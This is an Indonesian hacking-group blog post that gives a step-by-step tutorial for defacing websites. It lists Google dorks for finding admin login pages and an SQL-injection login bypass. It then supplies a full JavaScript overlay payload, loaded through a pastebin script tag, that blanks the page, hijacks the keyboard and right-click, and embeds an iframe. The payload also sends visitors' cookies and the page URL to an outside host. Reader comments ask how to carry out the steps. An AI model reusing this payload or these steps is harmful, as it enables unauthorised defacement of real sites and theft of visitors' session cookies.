ⓘ Baru saja dioptimalkan oleh GoogleLihat yang asli

http://blog.garudasecurityhacker.org/2016/12/tutorial-deface-dengan-bypass-
admin.html?m=1
Garuda Security Hacker
MENU
MENU
Tutorial Deface Dengan Bypass Admin With JS Overlay
posted by Evelyn on Saturday, December 10, 2016 7 comments


Hello Hello , kemaren tuan2fay bingung gak ada yang post di blog GSH :(
oke deh , mumpung lagi free aku kasih tutorial :)

Tutorial Deface Dengan Bypass Admin With JS Overlay

Dork :
inurl:/admin/index.php
inurl:/admin/login.php
inurl:/administrator/index.php
inurl/administrator/login.php
bisa kalian tambahkan intitle:admin / login site:.co.li

Oke Selanjutnya kita buat Catetan di pastebin , Buat JS Overlay nya

Code
/*
<style>html,body{color:#ffffff}</style><font
color='white'><script>top.location.href='http://www.google.com/?
v=wall/'</script><noscript><META HTTP-EQUIV="refresh"
CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title="Pwnd Gasai47"
var shortc=document.createElement("link");shortc.rel="SHORTCUT
ICON";shortc.href="https://66.media.tumblr.com/ae95f10220dc9965b718b6966606d6cf/tum
blr_n1yxvxZNgo1t014gho1_500.gif";document.getElementsByTagName("head")
[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("You Lose , Zuhahahaha");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('You Lose , Zuhahahaha');
}
if(location.href.indexOf('transtv.co.id')==-1)setTimeout("alert('Yoshioka in Your
Heart');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe
src='http://sholihahlooks.com/sector.html' height='620px' width='1100px'
scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1)
{x=escape(document.cookie);v=escape(location.href);y="que3n4ngelz@yahoo.co.id";log=
";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)
+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz
Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:#000"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe
src='http://sholihahlooks.com/sector.html' height='620px' width='1100px'
scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-
color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}
kalian buat new paste , lalu paste kan script di atas
warna merah : buat alert
warna biru : link deface kalian / bekas / mirror , untuk menutupi halaman yang kita
JS Overlay
nah kalo udah buat silahkan dorking


Nah kalo udah nemu target kita bypass , tidak semua web bisa

username : '=''or'
password : '=''or'


Kita Tambah Konten / Kategori / apa yang bisa kita post di web tsb.

nah tadi udah buat pastebin kan ? nah di sini kita gunain :)

kalian klik raw di pastebin kalian


nah keluarnya gini , sekarang kita tambah java script :)
ex :
<script type="text/javascript" src="http://pastebin.com/raw/jnspgP0M"></script>

warna merah ganti link pastebin raw kalian :)

Jedooorrrr!!
demo < kalo udah di patch jgn salahin hehe


Tidak ada yang tidak mungkin selai kita belajar , mengembangkan , kreasi sendiri
lebih baik
kacang tidak lupa kulit nya lebih indah :)

Mirror ?
Defacer.ID - OK
Zone-H - OK
Zone-Deface - OK

Thanks to LinuxSec <3

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 |

DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! |
./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And
All Member of Garuda Security Hacker
— Share It —
RELATED POSTS

Deface WordPress Themify Arbitrary File Crot

Deface Array Files Shell Upload Vulnerability

Deface Metode Alstrasoft ProTaxi Enterpris Register and Upload Shell
Newer Post
Older Post
7 Comments:

Dididuy
said...
Mas maaf. yang di kolom news itu diisi sama apa ya?
December 10, 2016 at 6:05 PM

teh kotak
said...
ijin copas min
December 11, 2016 at 3:25 AM

Evelyn
said...
silahkan , jangan lupa sertakan sumber ya :)
December 14, 2016 at 9:45 PM

Evelyn
said...
isi script JSO mu , maaf baru buka gmail
December 14, 2016 at 9:45 PM

Raf Lii
said...
news nya di isi apa ? yg ini => atau yg panjang itu ??

dan sudah saya upload beritanya tpi kok kenapa ngk berubah ya index nya ?
December 18, 2016 at 3:07 PM

SH460WM4N
said...
masih bingung ane :v
May 29, 2017 at 9:15 AM

Achmad luthfi
said...
klik raw bagian mana gan
June 1, 2017 at 1:29 PM
Post a Comment
CARI KONTEN BLOG
Search



HALAMAN BANTUAN
Laporan Link Rusak ?
Facebook Members
Daftar Isi - Garuda Security Hacker | Official Blo...
The Warehouse of Garuda Security Hacker
Online Tools
Portal Utama Garuda Security Hacker
Kumpulan Bahan Belajar Otodidak
Project Team
POPULAR POSTS

Tutorial Deface Dengan Bypass Admin With JS Overlay

Deface Dengan Responsive FileManager

Tutorial Deface Dengan Teknik Bypass Admin Login with Inject

Download 5 Ebook Hacking Free

Deface Uploadify Arbitrary File Upload (New Dork)

Cara Memasukan Lagu Ke Script Deface

Kali Linux : Sadap Atau Hacking Android Dengan Metasploit

Menggunakan GNURoot Debian Sebagai Platform Pentest Di Smartphone Android

Cara Akses Shell/Script di CMS Open Journal System

Deface Array Files Shell Upload Vulnerability
BLOG ARCHIVE
2018 (5)
2017 (95)
2016 (87)
December (22)
GSH CLI Shell v 1.0
Deface CMS RaphSoft With Add News
Tips Mencari Tempat Upload File Bersama Akses File...
Deface Dengan Upload Button
Ebook Teori Cyber Security Dari Microsoft
Open Source Project : Sample CMS Exploiter / Web B...
Sector.V2 Berbagi Pengalaman
Download 5 Ebook Hacking Free
Kali Linux : Stress Testing Dengan THC SSL DOS
Kali Linux : Dasar Penggunaan Nmap
Parrot Sec OS : Simple Information Gathering Denga...
Wi-Fu Aplikasi Intrusion Detection System (IDS) Be...
Windows Security Engineering (Anti Hacker)
Kali Linux : Mendeteksi Platform Dan Firewall Webs...
Kali Linux : Identifikasi Dan Dekripsi Password Ha...
Deface Easy File sharing web server Vulnerability ...
Cara Mendapatkan Username Dari Error Log Website
Tutorial Deface Themes RightNow WordPress Upoadify...
Deface Metode Uploader Japan New Dork
Deface Metode Pukiwiki Create Page
Bypass Admin With Email
Tutorial Deface Dengan Bypass Admin With JS Overla...
October (6)
September (6)
August (6)
July (22)
June (25)
LABEL CLOUD
About
Android
Bad USB
Berita
Cryptocurrency
CTF
Ddos
Deface
Ebook
Exploit
Facebook Hacking Art
Hacking
Hardware
Information Gathering
IOS
Linux
Other
Password
Pemrograman
Portal Belajar Otodidak
Reverse Engineering
Security
Shell
Tips and Trik
Tools
Troubleshooting
Tutorial
USB Rubber Ducky
vidio
Vitube.id
Vulnerability Analysis
Wi-Fi
Wifi Id
Windows
YANG MONDAR MANDIR

892,279
IKUTI KAMI
Designed with by Way2Themes | Distributed by Blogspot Themes
Home
|
Contact
|
About
|
Top ↑#